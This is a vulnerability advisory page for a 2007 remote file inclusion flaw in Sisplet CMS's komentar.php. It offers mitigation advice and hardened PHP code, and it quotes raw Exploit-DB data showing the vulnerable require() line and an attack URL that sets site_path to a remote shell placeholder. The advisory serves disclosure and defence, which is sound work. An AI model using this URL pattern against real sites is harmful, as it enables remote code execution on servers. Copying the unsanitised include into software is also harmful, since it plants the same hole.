Vendor: Sisplet CMS
By: kezzap66345
CVSS: 5.5 (MEDIUM)
RFI (Remote File Inclusion)
CWE: 98
Product Name: Sisplet CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sisplet CMS

Sisplet CMS is vulnerable to a Remote File Inclusion (RFI) attack in the main/forum/komentar.php file, which concatenates the 'site_path' parameter into a require() call. An attacker can exploit this vulnerability by injecting a malicious URL in the 'site_path' parameter, leading to the inclusion of arbitrary remote files.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in file inclusion functions. Additionally, the use of a web application firewall can help in preventing such attacks.
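
A hardened form of the include in komentar.php, as an added example (not Sisplet CMS code and not part of the original advisory). It assumes komentar.php sits in main/forum/ under the application root and that $site_path can be set from the request when the file is called directly; SITE_ROOT and safe_include_path() are hypothetical names.

```php
<?php
// Added example, not Sisplet CMS code. Hardened replacement for the pattern
//   require($site_path.'main/forum/class.php');
// Assumption: this file lives in <root>/main/forum/, so the application
// root is two directories above it.

// 1. Derive the base path on the server; never read it from the request.
define('SITE_ROOT', realpath(__DIR__ . '/../..'));

/**
 * Resolve a path relative to SITE_ROOT and return it only if it is an
 * existing local .php file inside SITE_ROOT. Hypothetical helper name.
 */
function safe_include_path(string $relative): string
{
    // Reject URL schemes and stream wrappers (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        throw new RuntimeException('remote or wrapper path rejected');
    }
    // realpath() collapses ../ and symlinks, and returns false for
    // anything that does not exist on the local filesystem.
    $resolved = realpath(SITE_ROOT . DIRECTORY_SEPARATOR . $relative);
    if ($resolved === false
        || strpos($resolved, SITE_ROOT . DIRECTORY_SEPARATOR) !== 0
        || pathinfo($resolved, PATHINFO_EXTENSION) !== 'php') {
        throw new RuntimeException('include path outside application root');
    }
    return $resolved;
}

// 2. Refuse requests that try to supply the variable at all, and log them
//    so the attempt is visible in monitoring.
if (isset($_REQUEST['site_path'])) {
    error_log('site_path supplied in request from ' . ($_SERVER['REMOTE_ADDR'] ?? '-'));
    http_response_code(400);
    exit;
}

// 3. Include through the checked, server-defined path.
require safe_include_path('main/forum/class.php');
```

Keeping allow_url_include = Off in php.ini (its default) adds a second barrier, because require() then refuses http:// and ftp:// targets even if a path check is missed.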

Exploit-DB raw data:

Sisplet CMS
*****************
Found by kezzap66345 *
*****************
*****************
Script Download:http://www.sisplet.org/uploadi/editor/Sisplet0504.tar.bz2
		        https://sourceforge.net/project/showfiles.php?group_id=111881

*****************
*****************
ERROR#1:
File:main/forum/komentar.php
*****************


require($site_path.'main/forum/class.php');     <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/main/forum/komentar.php?site_path=[SHELL]


**************************************************************************************
**************************************************************************************
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************

# milw0rm.com [2007-04-05]